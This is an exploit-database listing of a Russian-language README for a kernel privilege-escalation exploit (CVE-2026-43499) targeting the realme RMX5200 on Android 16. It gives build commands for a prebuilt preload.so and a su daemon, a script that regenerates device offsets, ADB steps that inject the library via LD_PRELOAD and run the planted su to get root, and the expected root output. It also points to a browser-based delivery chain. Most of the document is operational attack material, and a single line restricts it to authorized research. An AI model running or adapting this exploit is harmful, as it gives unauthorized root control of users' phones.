Sploitus

Exploit for CVE-2026-43499-RMX5200

kitploit · 2026-08-27

Exploit Code

MARKDOWN158 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SORROW404NULL-CVE-2026-43499-RMX5200
# CVE-2026-43499 для realme RMX5200

CVE-2026-43499 локальное повышение привилегий **SO** для:

Элемент| Значение  
---|---  
Устройство| realme **RMX5200** / RE6030L1  
Android| 16  
Ядро| `6.12.23-android16-5-gb2a876903b49-ab14541642-4k`  
Fingerprint| `realme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys`  
  
Готовый бинарник: `bin/preload.so`

В этом репозитории находится **только дерево сборки SO** (исходники + смещения + готовый бинарник). Ни браузерного харнеса, ни дампов прошивки, ни тестовой оснастки.

Основано на публичной цепочке в стиле IonStack / popsicle; смещения пересобраны из `boot.img` \+ `xbl_config.img` этого устройства.

* * *

## Структура

root@kitploit:~
    
    
    .
    ├── bin/preload.so              # prebuilt aarch64 shared object (verified)
    ├── generate_target.py          # optional: regenerate target.h from boot+xbl
    ├── source/
    │   ├── Makefile
    │   └── src/
    │       ├── target.h            # RMX5200 offsets
    │       ├── main.c preload.c slide.c ...
    │       └── kernelsnitch/
    └── README.md
    

* * *

## Сборка

Требования:

  * Android NDK (рекомендуется r27+)
  * Python 3 + `llvm-objdump` (только для пересоздания `target.h`)



### С помощью make

root@kitploit:~
    
    
    # Linux NDK example
    export NDK_ROOT=/path/to/android-ndk
    make -C source clean preload
    
    # Windows NDK example
    make -C source clean preload \
      NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
      NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"
    

Результат:

root@kitploit:~
    
    
    source/build/bin/preload.so
    

### Без make (напрямую clang)

root@kitploit:~
    
    
    cd source
    mkdir -p build/bin build/embed
    CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"
    
    $CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
      src/su_daemon.c -o build/embed/su_daemon_aarch64_pie
    
    $CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
      -DTARGET_CONFIG_H=\"target.h\" \
      src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
      src/preload.c src/su_blob.S \
      -shared -o build/bin/preload.so -pthread
    

### Пересоздание смещений (необязательно)

Нужны соответствующие образы прошивки (здесь не приложены):

root@kitploit:~
    
    
    python3 generate_target.py \
      --boot boot.img \
      --xbl-config xbl_config.img \
      --llvm-objdump llvm-objdump \
      -o source/src/target.h
    

* * *

## Запуск

### ADB LD_PRELOAD

root@kitploit:~
    
    
    adb push bin/preload.so /data/local/tmp/preload.so
    adb shell 'chmod 0644 /data/local/tmp/preload.so'
    adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
    adb shell '/data/local/tmp/su -c id'
    

### Браузерная цепочка (внешняя)

Загрузите этот `preload.so` через хост в стиле Firefox-151 lonStack (например, запись устройства Rootme). В этот репозиторий не включено.

Маркеры успеха:

root@kitploit:~
    
    
    slide-kaslr-ok
    direct credential result uid=0 ...
    local su binary ready path=/data/local/tmp/su
    direct-root-summary root=1 ...
    

root@kitploit:~
    
    
    uid=0(root) gid=0(root) ... context=kernel
    

* * *

## Примечания

  * **Только временный root** — теряется после перезагрузки.
  * После успешного выполнения некоторые приложения могут не пройти инициализацию Framework до перезагрузки (тот же класс побочных эффектов, что и у смежных публичных эксплойтов).
  * Смещения **привязаны к конкретной сборке**. Для других OTA-сборок нужен новый `target.h` / пересборка.
  * Только для авторизованных исследований безопасности на принадлежащих вам устройствах.



* * *

## Благодарности

  * Публичный исследовательский контекст: разборы IonStack / CVE-2026-43499
  * Линия реализации: цепочка `preload.so` в стиле popsicle
  * Адаптация под устройство: RMX5200 (RE6030L1)